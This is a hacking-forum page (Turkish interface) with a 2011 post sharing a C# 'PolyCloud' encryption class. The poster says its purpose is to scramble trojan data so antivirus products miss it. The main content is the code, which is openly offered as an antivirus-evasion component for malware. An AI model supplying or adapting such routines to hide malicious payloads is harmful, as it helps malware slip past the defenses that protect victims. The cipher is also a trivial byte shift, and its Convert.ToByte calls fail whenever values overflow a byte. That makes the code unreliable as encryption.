EMO Style ForumPro - Hos Geldiniz
[C#]PolyCloud Encryption - Byte[] Included!  Uyeols10

Join the forum, it's quick and easy

EMO Style ForumPro - Hos Geldiniz
[C#]PolyCloud Encryption - Byte[] Included!  Uyeols10
EMO Style ForumPro - Hos Geldiniz
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Giriş yap

Şifremi unuttum

Istatistikler
Toplam 203 kayıtlı kullanıcımız var
Son kaydolan kullanıcımız: crayzboy76

Kullanıcılarımız toplam 1186 mesaj attılar bunda 862 konu
Tarıyıcı
 Kapı
 Indeks
 Üye Listesi
 Profil
 SSS
 Arama
Arama
 
 

Sonuç :
 


Rechercher çıkıntı araştırma

RSS akısı


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


Anahtar-kelime

pointer  kutu  loot  

Kimler hatta?
Toplam 5 kullanıcı online :: 0 Kayıtlı, 0 Gizli ve 5 Misafir

Yok

[ Bütün listeye bak ]


Sitede bugüne kadar en çok 217 kişi C.tesi Tem. 29, 2017 1:46 am tarihinde online oldu.
En son konular
» İnternetten Para Kazandıran Oyun ! Ödeme Alt Limiti Yok ! DEV KONU
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeCuma Ağus. 29, 2014 8:33 am tarafından Hello EMO

» goldenchase.net maden yaparak para kazanma
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeCuma Ağus. 29, 2014 8:18 am tarafından Hello EMO

» etichal hacker görsel egitim seti
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeÇarş. Ağus. 06, 2014 4:57 am tarafından Hello EMO

» KO TBL Source C#
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimePtsi Ara. 09, 2013 6:36 am tarafından Hello EMO

» x86 Registers
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeC.tesi Ağus. 24, 2013 5:02 am tarafından Hello EMO

» [Tutorial] Pegando Address, Pointers de WYD
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeÇarş. Tem. 10, 2013 7:25 am tarafından Hello EMO

» [Tutorial] Pegando Address, Pointers de CS Metodo²
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeÇarş. Tem. 10, 2013 7:23 am tarafından Hello EMO

» [Tutorial] Aprendendo basico deASM OLLYDBG
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimeÇarş. Tem. 10, 2013 7:22 am tarafından Hello EMO

» Basic C# DLL injector
[C#]PolyCloud Encryption - Byte[] Included!  I_icon_minitimePtsi Tem. 08, 2013 7:48 am tarafından Hello EMO

Reklam

[C#]PolyCloud Encryption - Byte[] Included!

Aşağa gitmek

[C#]PolyCloud Encryption - Byte[] Included!  Empty [C#]PolyCloud Encryption - Byte[] Included!

Mesaj tarafından Hello EMO Cuma Haz. 03, 2011 7:39 pm

This should be scrambled enough for AV's not to detect the trojan data, and as it is new, should not lead to detections.

Anyways, here it is:
Code:

public class PolyCloud
{
#region "Static Functions"

public static string EncryptData(string Input, string Key)
{
return Convert.ToBase64String(EncryptData(System.Text.Encoding.UTF8.GetBytes(Input),
System.Text.Encoding.UTF8.GetBytes(Key)));
}

public static byte[] EncryptData(byte[] Input, byte[] Key)
{
Random Rnd = new Random();
int Salt = Rnd.Next(1, 50);
byte[] FinVal = new byte[Input.Length + 1];
FinVal[Input.Length] = (byte)Salt;
short kc = 0;
for (int index = 0; index < Input.Length; index++)
{
if (kc >= Key.Length)
kc = 0;
FinVal[index] = Convert.ToByte(Input[index] + (Input.Length % Key.Length) + (Key[kc]) - Salt);
kc++;
}
return FinVal;
}

public static string DecryptData(string Input, string Key)
{
return System.Text.Encoding.UTF8.GetString(DecryptData(Convert.FromBase64String(Input),
System.Text.Encoding.UTF8.GetBytes(Key)));
}

public static byte[] DecryptData(byte[] Input, byte[] Key)
{
int Salt = (int)Input[Input.Length - 1];
byte[] FinVal = new byte[Input.Length - 1];
short kc = 0;
for (int index = 0; index < Input.Length - 1; index++)
{
if (kc >= Key.Length)
kc = 0;
if (index >= Input.Length - 1)
continue;
FinVal[index] = Convert.ToByte(Input[index] - (FinVal.Length % Key.Length) - (Key[kc]) + Salt);
kc++;
}
return FinVal;
}
#endregion
}

[C#]PolyCloud Encryption - Byte[] Included!  Drogar-Mark-01%28DBG%29 Ethereal [C#]PolyCloud Encryption - Byte[] Included!  Drogar-Mark-01%28DBG%29
Hello EMO
Hello EMO
EMO Team
EMO Team

Cinsiyet : Erkek
Burçlar : Yay
Yılan
Mesaj Sayısı : 935
Puan : 373893
Rep Puanı : 18
Doğum tarihi : 28/11/89
Kayıt tarihi : 21/07/09
Yaş : 34
Nerden : EMO WorlD
İş/Hobiler : RCE Student / Game Hacking / Learn Beginner C#,C++,Delphi
Lakap : EMO

https://emostyle.yetkinforum.com

Sayfa başına dön Aşağa gitmek

Sayfa başına dön

- Similar topics

 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz